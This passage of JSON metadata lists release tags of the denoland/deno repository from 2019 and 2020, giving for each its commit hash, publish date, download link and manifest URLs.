ifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno